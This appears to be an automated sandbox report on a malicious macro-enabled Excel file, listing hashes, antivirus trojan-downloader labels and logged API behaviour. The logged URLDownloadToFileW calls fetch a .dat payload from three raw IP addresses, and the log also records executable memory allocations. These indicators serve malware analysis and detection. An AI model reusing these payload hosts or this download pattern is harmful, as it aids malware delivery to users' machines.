popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

5bef7b39fe02eabea2c0261275876217eb8cc2f1c861c1a7ffeba6c1b0769373.xlsm

VBA_macro
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 April 30, 2021, 9:21 a.m. April 30, 2021, 9:23 a.m.
Size 217.6KB
Type Microsoft Excel 2007+
MD5 6f203feba292f1322dae52e76dbf4ce4
SHA256 5bef7b39fe02eabea2c0261275876217eb8cc2f1c861c1a7ffeba6c1b0769373
CRC32 909247A0
ssdeep 3072:owfbewQHBYJ6tID2WMgHYF0WDRCSm6eh7XtANARwb/Biqhqyn5:9luYQwDPM0Mhm559AYqD5
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
172.217.25.14 Active Moloch
185.82.218.30 Active Moloch
190.14.37.252 Active Moloch
91.211.91.71 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

suspicious_features Connection to IP address suspicious_request GET http://190.14.37.252/44313,6048108796.dat
suspicious_features Connection to IP address suspicious_request GET http://91.211.91.71/44313,6048108796.dat
suspicious_features Connection to IP address suspicious_request GET http://185.82.218.30/44313,6048108796.dat
request GET http://190.14.37.252/44313,6048108796.dat
request GET http://91.211.91.71/44313,6048108796.dat
request GET http://185.82.218.30/44313,6048108796.dat
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70af1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73711000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05641000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x66c51000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x66c11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73c91000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x743c1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3972
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05f80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3972
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05f80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3972
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05f90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3972
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05fa0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73cd1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73cb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x743b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73321000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71f61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71f71000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$5bef7b39fe02eabea2c0261275876217eb8cc2f1c861c1a7ffeba6c1b0769373.xlsm
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000348
filepath: C:\Users\test22\AppData\Local\Temp\~$5bef7b39fe02eabea2c0261275876217eb8cc2f1c861c1a7ffeba6c1b0769373.xlsm
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$5bef7b39fe02eabea2c0261275876217eb8cc2f1c861c1a7ffeba6c1b0769373.xlsm
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
K7AntiVirus Trojan ( 0057940f1 )
K7GW Trojan ( 0057940f1 )
Cyren PP97M/Downldr.RK.gen!Eldorado
Zoner Probably Heur.W97ShellM
host 172.217.25.14
host 185.82.218.30
host 190.14.37.252
host 91.211.91.71
Time & API Arguments Status Return Repeated

URLDownloadToFileW

 url: http://190.14.37.252/44313,6048108796.dat
stack_pivoted: 0
filepath_r: ..\Butyo.vikas
filepath: C:\Users\test22\Butyo.vikas
2148270088 0

URLDownloadToFileW

 url: http://91.211.91.71/44313,6048108796.dat
stack_pivoted: 0
filepath_r: ..\Butyo.vikas
filepath: C:\Users\test22\Butyo.vikas
2148270088 0

URLDownloadToFileW

 url: http://185.82.218.30/44313,6048108796.dat
stack_pivoted: 0
filepath_r: ..\Butyo.vikas
filepath: C:\Users\test22\Butyo.vikas
2148270088 0